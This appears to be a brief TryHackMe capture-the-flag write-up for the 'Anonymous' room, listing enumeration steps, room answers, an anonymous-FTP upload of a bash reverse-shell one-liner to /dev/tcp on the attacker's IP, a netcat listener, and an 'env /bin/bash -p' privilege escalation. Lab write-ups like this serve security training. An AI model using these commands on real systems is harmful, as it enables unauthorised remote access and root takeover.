Anonymous — TryHackMe Write-up | Cyberw1ng

Karthikeyan Nagaraj
2 min readJul 27, 2022

Not the hacking group

Task 1

1. Enumerate the machine. How many ports are open?

Use Nmap to Scan Ports - nmap -sC -sV <Machine-ip>

2. What service is running on port 21?

Ans: ftp

3. What service is running on ports 139 and 445?

Samba — smb
Ans: smb

4. There’s a share on the user’s computer. What’s it called?

Hint: smbclient -L \\ip/

Ans: pics

5. user.txt

We can Access FTP and Upload Files, So we have to upload a code to gain Reverse Shell

echo “bash -i >& /dev/tcp/10.9.0.171/1234 0>&1” > clean.sh
ftp <machine-ip>
cd scripts
put clean.sh
Anonymous Password don’t need password

After that you need to Make a Listener

nc -lvnp 1234

It May Take Time upto 3 Minutes to Get a Reverse Shell, and Once You get is > > Cat user.txt

6. root.txt

use the Below Command to Escalate Privilege

env /bin/bash -p 
cd /root
cat root.txt

Thank You For Reading!!!

Happy Hacking!!!

--

--

Karthikeyan Nagaraj
Karthikeyan Nagaraj

Written by Karthikeyan Nagaraj

Entrepreneur | Writer | Cyber Security Consultant | AI Researcher

No responses yet